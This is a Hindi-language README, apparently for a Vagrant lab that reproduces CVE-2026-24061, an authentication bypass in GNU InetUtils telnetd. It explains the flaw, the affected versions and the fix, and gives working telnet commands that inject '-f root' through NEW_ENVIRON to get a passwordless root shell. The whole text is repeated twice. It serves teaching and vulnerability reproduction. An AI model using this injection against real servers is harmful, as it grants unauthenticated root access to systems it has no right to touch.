
# CVE-2026-24061 के लिए प्रजनन प्रयोगशाला, GNU InetUtils telnetd में एक प्रमाणीकरण बाईपास। Vagrant-आधारित पृथक वातावरण और रूट शेल एक्सेस प्रदर्शित करने के लिए चरण-दर-चरण शोषण निर्देश प्रदान करता है।
⚠️ केवल शैक्षिक उद्देश्यों के लिए। पृथक लैब वातावरण।
GNU InetUtils telnetd ≤ 2.7 में गंभीर प्रमाणीकरण बायपास (CVSS 9.8)।
-f root को USER वेरिएबल के रूप में Telnet NEW_ENVIRON विकल्प के माध्यम से इंजेक्ट करके,
एक अप्रमाणित हमलावर बिना किसी पासवर्ड के रूट शेल प्राप्त कर सकता है।
Telnet नेगोशिएशन के दौरान क्लाइंट से प्राप्त USER वेरिएबल को
बिना सैनिटाइज़ेशन के सीधे /usr/bin/login में पास किया जाता है:
/usr/bin/login -p -f root
-f फ्लैग login को बताता है कि वह दिए गए उपयोगकर्ता के लिए पासवर्ड सत्यापन छोड़ दे।
यह व्यवहार RFC 1572 (अनुच्छेद 7) में एक ज्ञात जोखिम के रूप में प्रलेखित है — फिर भी यह बग
inetutils में एक दशक से अधिक समय तक मौजूद रहा।
GNU InetUtils telnetd 1.9.3 से 2.7
GNU InetUtils ≥ 2.7-2 में अपग्रेड करें
यह लैब Vagrant का उपयोग करके एक वास्तविक पृथक VM तैयार करता है जो telnetd (inetutils 2.5, सोर्स से संकलित) का असुरक्षित संस्करण चला रहा है, जिससे यह वास्तविक वातावरण के जितना संभव हो उतना करीब है।
आवश्यकताएँ: आपकी मशीन पर Vagrant + VirtualBox स्थापित होना चाहिए।
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up
VM का IP 192.168.56.10 है और telnetd पोर्ट 23 पर सुनता है।

अपनी होस्ट मशीन से:
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23
USER वेरिएबल को नेगोशिएशन चरण के दौरान NEW_ENVIRON Telnet विकल्प के माध्यम से इंजेक्ट किया जाता है — लॉगिन प्रॉम्प्ट प्रकट होने से पहले।

Agokoli
⚠️ केवल शैक्षिक उपयोग। पृथक वातावरण।
GNU InetUtils telnetd ≤ 2.7 में गंभीर प्रमाणीकरण बायपास (CVSS 9.8)।
-f root को USER वेरिएबल के मान के रूप में Telnet NEW_ENVIRON विकल्प के माध्यम से इंजेक्ट करके,
एक अप्रमाणित हमलावर बिना किसी पासवर्ड के रूट शेल प्राप्त कर सकता है।
Telnet नेगोशिएशन के दौरान क्लाइंट से प्राप्त USER वेरिएबल को
बिना सत्यापन के सीधे /usr/bin/login में पास किया जाता है:
/usr/bin/login -p -f root
-f फ्लैग login को बताता है कि वह दिए गए उपयोगकर्ता के लिए पासवर्ड सत्यापन न करे।
यह जोखिम RFC 1572 (अनुच्छेद 7) में प्रलेखित है — फिर भी यह बग एक दशक से अधिक समय तक
inetutils में मौजूद रहा।
GNU InetUtils telnetd 1.9.3 से 2.7
GNU InetUtils ≥ 2.7-2 में अपडेट करें
यह लैब Vagrant का उपयोग करके एक वास्तविक पृथक VM तैयार करता है जो telnetd (inetutils 2.5, स्रोतों से संकलित) का असुरक्षित संस्करण चला रहा है, ताकि यह वास्तविक वातावरण के जितना संभव हो उतना करीब हो।
आवश्यकताएँ: आपकी मशीन पर Vagrant + VirtualBox स्थापित होना चाहिए।
git clone https://github.com/agokoli/cve-2026-24061-lab
cd cve-2026-24061-lab
vagrant up
VM का IP 192.168.56.10 है और telnetd पोर्ट 23 पर सुनता है।

अपनी होस्ट मशीन से:
telnet
telnet> environ define USER "-f root"
telnet> open 192.168.56.10 23
USER वेरिएबल को नेगोशिएशन चरण के दौरान Telnet प्रोटोकॉल के NEW_ENVIRON विकल्प के माध्यम से इंजेक्ट किया जाता है —
login: प्रॉम्प्ट प्रकट होने से पहले ही।

Agokoli